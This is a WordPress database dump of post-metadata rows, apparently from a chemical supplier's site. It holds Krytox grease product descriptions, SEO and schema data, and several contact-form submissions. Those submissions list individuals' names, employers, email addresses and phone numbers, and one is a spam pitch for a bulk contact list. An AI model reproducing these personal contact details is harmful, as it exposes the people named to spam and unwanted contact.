INSERT INTO `wp_postmeta` VALUES (44225, 2772, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44226, 2772, '_schema_json_timestamp', '1503057771'); 
INSERT INTO `wp_postmeta` VALUES (44227, 4853, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (44228, 4853, '_seq_num', '353'); 
INSERT INTO `wp_postmeta` VALUES (44229, 4853, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44230, 4853, '_field_12', 'Dhruv Agarwal'); 
INSERT INTO `wp_postmeta` VALUES (44231, 4853, '_field_13', 'GIC'); 
INSERT INTO `wp_postmeta` VALUES (44232, 4853, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (44233, 4853, '_field_14', 'dhruv_agarwal@vfc.com'); 
INSERT INTO `wp_postmeta` VALUES (44234, 4853, '_field_15', '(336) 332-4547'); 
INSERT INTO `wp_postmeta` VALUES (44235, 4853, '_field_16', 'I am looking for a very flexible thin wire coating that will provide the wire- Chemical especially Alkali and High Humidity and boiling water resistance + Abrasion Resistance. The coating needs to be transparent. The wire has reflective material and we donot want to hinder the reflectivity of the wire with this coating.\n\nPlease suggest'); 
INSERT INTO `wp_postmeta` VALUES (44236, 4853, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (44237, 4853, '_sub_id', '4853'); 
INSERT INTO `wp_postmeta` VALUES (44238, 4854, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (44239, 4854, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (44240, 4854, '_menu_item_object_id', '4790'); 
INSERT INTO `wp_postmeta` VALUES (44241, 4854, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (44242, 4854, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (44243, 4854, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (44244, 4854, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (44245, 4854, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (44247, 4790, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:52:"https://www.miller-stephenson.com/become-a-supplier/";}s:3:"url";s:52:"https://www.miller-stephenson.com/become-a-supplier/";s:8:"headline";s:17:"Become a Supplier";s:13:"datePublished";s:25:"2017-08-08T14:05:49+00:00";s:12:"dateModified";s:25:"2017-08-08T15:37:47+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:302:"Please fill out the form below to become a supplier. After review, our team will reach out to your company. Our reviewing process takes up to 10 business days. If approved, we will send you a file that will include product images, descriptions, specifications, applications, technical data, and pricing";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44248, 4790, '_schema_json_timestamp', '1503416413'); 
INSERT INTO `wp_postmeta` VALUES (44249, 218, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44250, 218, '_schema_json_timestamp', '1503063664'); 
INSERT INTO `wp_postmeta` VALUES (44251, 1881, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44252, 3299, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44254, 642, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44255, 642, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44256, 642, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (44257, 642, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (44258, 642, '_ywtm_content_tab_description', 'Applications for Krytox 240AA lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AA grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.'); 
INSERT INTO `wp_postmeta` VALUES (44263, 1893, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44267, 1331, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44268, 1331, '_schema_json_timestamp', '1503070788'); 
INSERT INTO `wp_postmeta` VALUES (44273, 1738, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44274, 1738, '_schema_json_timestamp', '1503071383'); 
INSERT INTO `wp_postmeta` VALUES (44275, 1753, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44276, 1753, '_schema_json_timestamp', '1503072758'); 
INSERT INTO `wp_postmeta` VALUES (44277, 4178, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44279, 827, '_schema_json_timestamp', '1503410935'); 
INSERT INTO `wp_postmeta` VALUES (44282, 1776, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44283, 4856, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (44284, 4856, '_seq_num', '905'); 
INSERT INTO `wp_postmeta` VALUES (44285, 4856, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44286, 4856, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (44287, 4856, '_field_1', 'Zakk putapon'); 
INSERT INTO `wp_postmeta` VALUES (44288, 4856, '_field_10', 'A plus auto&amp;tires'); 
INSERT INTO `wp_postmeta` VALUES (44289, 4856, '_field_2', 'hputapon@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (44290, 4856, '_field_8', '(727) 223-4967'); 
INSERT INTO `wp_postmeta` VALUES (44291, 4856, '_field_3', 'Ask for me ham. I want to know how to buy automotive motor oil from your company. '); 
INSERT INTO `wp_postmeta` VALUES (44292, 4856, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (44293, 4856, '_sub_id', '4856'); 
INSERT INTO `wp_postmeta` VALUES (44294, 642, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44295, 642, '_schema_json_timestamp', '1503243597'); 
INSERT INTO `wp_postmeta` VALUES (44296, 644, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44297, 644, '_schema_json_timestamp', '1503413386'); 
INSERT INTO `wp_postmeta` VALUES (44298, 85, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44299, 85, '_schema_json_timestamp', '1503077305'); 
INSERT INTO `wp_postmeta` VALUES (44303, 638, '_schema_json_timestamp', '1503413370'); 
INSERT INTO `wp_postmeta` VALUES (44304, 643, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44305, 643, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44306, 643, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (44307, 643, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (44308, 643, '_ywtm_content_tab_description', 'Krytox 240AB grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AB lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AB grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (44309, 4857, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (44310, 4857, '_seq_num', '906'); 
INSERT INTO `wp_postmeta` VALUES (44311, 4857, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44312, 4857, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (44313, 4857, '_field_1', 'Angelina Cole'); 
INSERT INTO `wp_postmeta` VALUES (44314, 4857, '_field_10', 'KBS'); 
INSERT INTO `wp_postmeta` VALUES (44315, 4857, '_field_2', 'angelina.cole@kougargroup.com'); 
INSERT INTO `wp_postmeta` VALUES (44316, 4857, '_field_8', '(888) 789-5465'); 
INSERT INTO `wp_postmeta` VALUES (44317, 4857, '_field_3', 'Hi,\r\nI saw your recent press release about expanding into sales development and I&#039;m writing because I am the perfect person to head up your sales team. And Our Email Append service adds missing business addresses to help you efficiently connect with your contacts.\r\n\r\nI just wanted to check if you would be interested in acquiring our newly updated Medical Device Professionals which will help you to reach the Beauty, Health &amp; Wellness, Business, Dermatology, Professional Healthcare across USA, UK, Canada, Europe and Global?\r\n\r\nHigh-level Audience professionals:\r\n\r\n•	Medical Device Manufacturers/Drug Packagers\r\n•	Research Organizers/Quality Certification Agents\r\n•	Regulatory Agents/Designers/ Exporters/Importers\r\n•	Manufacturers of Tubes And Injection Molded Components\r\n•	Manufacturers of Clean Room &amp; Sterilization Supplies\r\n•	Medical Plastics Processors/ Machinery Suppliers\r\n•	Plastics and Additive Producers\r\n•	Homeopathy Practitioners/Doctors/Dentists\r\n•	Veterinary Doctors/Nurses/Laboratory Technicians\r\n•	Physiotherapists/Dieticians/Pharmacists\r\n•	Chemists/Medical &amp; Nursing Students\r\n•	Social Health Workers/Health Researchers\r\n•	Beauticians/Health Insurance Agents/Representatives\r\n•	Trade Delegations/Medical Professionals\r\n•	Purchase &amp; Production Associations\r\n•	Delegates Of Seminars/Health Professionals\r\n•	Service Providers In Health/Medical &amp; Fitness Industries\r\n•	Manufacturers/Distributors/Retailers\r\n•	CEOs/Top Executives of Companies/Purchase Executive\r\n•	Manufacturing Engineers of Pharmaceutical Companies\r\n•	Pharmacy Consultants/Scientists/Experts\r\n\r\nThe lists comes with complete details such as Name, Company, Website, Title, Phone number, Fax number, Email address, Country, SIC code, zip code, revenue &amp; employees.\r\nKindly revert to us with your target Criteria (Any Industry Type / Geography) you wish to reach, I can get back to you with more relevant information, counts and pricing.  \r\n\r\nBest Regards,\r\nAngelina Cole | Business Development coordinator.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (44318, 4857, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (44319, 4857, '_sub_id', '4857'); 
INSERT INTO `wp_postmeta` VALUES (44320, 643, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44321, 643, '_schema_json_timestamp', '1503324170'); 
INSERT INTO `wp_postmeta` VALUES (44322, 1918, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44323, 1918, '_schema_json_timestamp', '1503115779'); 
INSERT INTO `wp_postmeta` VALUES (44324, 1899, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44326, 1289, '_schema_json_timestamp', '1503224589'); 
INSERT INTO `wp_postmeta` VALUES (44327, 4858, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (44328, 4858, '_seq_num', '907'); 
INSERT INTO `wp_postmeta` VALUES (44329, 4858, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44330, 4858, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (44331, 4858, '_field_1', 'Pat Tombow'); 
INSERT INTO `wp_postmeta` VALUES (44332, 4858, '_field_10', 'Artiflex Mfg'); 
INSERT INTO `wp_postmeta` VALUES (44333, 4858, '_field_2', 'Pat.Tombow@artiflexmfg.com'); 
INSERT INTO `wp_postmeta` VALUES (44334, 4858, '_field_8', '(330) 202-6926'); 
INSERT INTO `wp_postmeta` VALUES (44335, 4858, '_field_3', 'I am looking for a deep drawing compound for automotive sheetmetal stampings that has a rust preventative in it.   '); 
INSERT INTO `wp_postmeta` VALUES (44336, 4858, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (44337, 4858, '_sub_id', '4858'); 
INSERT INTO `wp_postmeta` VALUES (44339, 645, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44340, 645, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (44341, 645, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (44342, 645, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (44343, 645, '_ywtm_content_tab_description', 'Applications for Krytox 240AD lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AD grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.'); 
INSERT INTO `wp_postmeta` VALUES (44344, 1877, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44346, 1294, '_schema_json_timestamp', '1503254965'); 
INSERT INTO `wp_postmeta` VALUES (44350, 4568, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44351, 4568, '_schema_json_timestamp', '1503084144'); 
INSERT INTO `wp_postmeta` VALUES (44352, 645, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44353, 645, '_schema_json_timestamp', '1503386571'); 
INSERT INTO `wp_postmeta` VALUES (44354, 4860, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (44355, 4860, '_edit_lock', '1503086288:2'); 
INSERT INTO `wp_postmeta` VALUES (44356, 4860, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (44357, 3312, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44359, 4860, '_oembed_118a152e10e0be5012ae9455972550f3', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (44360, 4861, '_wp_attached_file', '2017/08/Mil-Spec-Lubricant-Krytox.jpg'); 
INSERT INTO `wp_postmeta` VALUES (44361, 4861, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:666;s:4:"file";s:37:"2017/08/Mil-Spec-Lubricant-Krytox.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"Mil-Spec-Lubricant-Krytox-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (44362, 4860, '_thumbnail_id', '4861'); 
INSERT INTO `wp_postmeta` VALUES (44364, 4860, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (44365, 4860, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (44366, 4860, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (44367, 4860, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2017/08/Mil-Spec-Lubricant-Krytox.jpg'); 
INSERT INTO `wp_postmeta` VALUES (44368, 4860, '_yoast_wpseo_focuskw_text_input', 'Mil-Spec'); 
INSERT INTO `wp_postmeta` VALUES (44369, 4860, '_yoast_wpseo_focuskw', 'Mil-Spec'); 
INSERT INTO `wp_postmeta` VALUES (44370, 4860, '_yoast_wpseo_title', 'How Krytox Meets the Mil-Spec Standards for Lubrication'); 
INSERT INTO `wp_postmeta` VALUES (44371, 4860, '_yoast_wpseo_metadesc', 'Mil-Spec or military specification lubricants allow the standardization objective by the U.S Department of Defense in procuring quality material.'); 
INSERT INTO `wp_postmeta` VALUES (44372, 4860, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (44373, 4860, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (44374, 4860, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (44378, 4860, '_yoast_wpseo_linkdex', '90'); 
INSERT INTO `wp_postmeta` VALUES (44384, 1175, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44385, 1175, '_schema_json_timestamp', '1503086314'); 
INSERT INTO `wp_postmeta` VALUES (44387, 4860, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:51:"https://www.miller-stephenson.com/what-is-mil-spec/";}s:3:"url";s:51:"https://www.miller-stephenson.com/what-is-mil-spec/";s:8:"headline";s:55:"How Krytox Meets the Mil-Spec Standards for Lubrication";s:13:"datePublished";s:25:"2017-08-18T19:54:45+00:00";s:12:"dateModified";s:25:"2017-08-18T19:59:02+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2017/08/Mil-Spec-Lubricant-Krytox.jpg";s:5:"width";i:1000;s:6:"height";i:666;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:494:"Military Specification Lubrication | Mil-Spec Lubrication A United States defense standard, often called a military standard, “MIL-STD“, “MIL-SPEC“, or (informally) “MilSpecs“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44388, 4860, '_schema_json_timestamp', '1503183661'); 
INSERT INTO `wp_postmeta` VALUES (44389, 1272, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44390, 1272, '_schema_json_timestamp', '1503086900'); 
INSERT INTO `wp_postmeta` VALUES (44393, 1959, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44394, 1959, '_schema_json_timestamp', '1503087263'); 
INSERT INTO `wp_postmeta` VALUES (44396, 1766, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44398, 867, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44399, 867, '_schema_json_timestamp', '1503088758'); 
INSERT INTO `wp_postmeta` VALUES (44400, 34, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44401, 34, '_schema_json_timestamp', '1503088820'); 
INSERT INTO `wp_postmeta` VALUES (44405, 923, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44406, 923, '_schema_json_timestamp', '1503090904'); 
INSERT INTO `wp_postmeta` VALUES (44408, 836, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44409, 836, '_schema_json_timestamp', '1503091416'); 
INSERT INTO `wp_postmeta` VALUES (44410, 1449, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44411, 4867, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (44412, 4867, '_seq_num', '908'); 
INSERT INTO `wp_postmeta` VALUES (44413, 4867, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (44414, 4867, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (44415, 4867, '_field_1', 'David Kool'); 
INSERT INTO `wp_postmeta` VALUES (44416, 4867, '_field_10', 'Precimax Mfg Ltd'); 
INSERT INTO `wp_postmeta` VALUES (44417, 4867, '_field_2', 'davek@precimax.com'); 
INSERT INTO `wp_postmeta` VALUES (44418, 4867, '_field_8', '(780) 436-2301'); 
INSERT INTO `wp_postmeta` VALUES (44419, 4867, '_field_3', 'I am looking for a mould release agent for a salt compression mould.'); 
INSERT INTO `wp_postmeta` VALUES (44420, 4867, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (44421, 4867, '_sub_id', '4867'); 
INSERT INTO `wp_postmeta` VALUES (44422, 2650, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44423, 2650, '_schema_json_timestamp', '1503091654'); 
INSERT INTO `wp_postmeta` VALUES (44424, 1341, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44425, 1341, '_schema_json_timestamp', '1503091910'); 
INSERT INTO `wp_postmeta` VALUES (44429, 1559, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44430, 1559, '_schema_json_timestamp', '1503117332'); 
INSERT INTO `wp_postmeta` VALUES (44431, 3188, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44433, 381, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44434, 3788, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44435, 3788, '_schema_json_timestamp', '1503098422'); 
INSERT INTO `wp_postmeta` VALUES (44436, 402, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44439, 1465, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44440, 1465, '_schema_json_timestamp', '1503103403'); 
INSERT INTO `wp_postmeta` VALUES (44443, 3191, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44444, 3191, '_schema_json_timestamp', '1503105682'); 
INSERT INTO `wp_postmeta` VALUES (44449, 1261, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44450, 1261, '_schema_json_timestamp', '1503109865'); 
INSERT INTO `wp_postmeta` VALUES (44452, 1643, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44456, 2846, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44457, 2846, '_schema_json_timestamp', '1503113130'); 
INSERT INTO `wp_postmeta` VALUES (44458, 2322, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:64:"https://www.miller-stephenson.com/steam-control-valve-lubricant/";}s:3:"url";s:64:"https://www.miller-stephenson.com/steam-control-valve-lubricant/";s:8:"headline";s:31:"Krytox For Steam Control Valves";s:13:"datePublished";s:25:"2016-10-06T17:14:51+00:00";s:12:"dateModified";s:25:"2016-10-12T19:53:06+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_317927645.jpg";s:5:"width";i:4000;s:6:"height";i:2667;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:40:"Control, Krytox, Lubricant, Steam, Valve";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:380:"Krytox Steam Control Valve Lubricant Krytox grease meets the need for a continuous lubrication cycle. Steam control valve lubricant application at a geothermal power plant The power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44460, 2788, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44461, 913, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44462, 913, '_schema_json_timestamp', '1503114811'); 
INSERT INTO `wp_postmeta` VALUES (44464, 1139, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44466, 862, '_schema_json_timestamp', '1503388707'); 
INSERT INTO `wp_postmeta` VALUES (44467, 824, '_schema_json', 'a:0:{}'); 
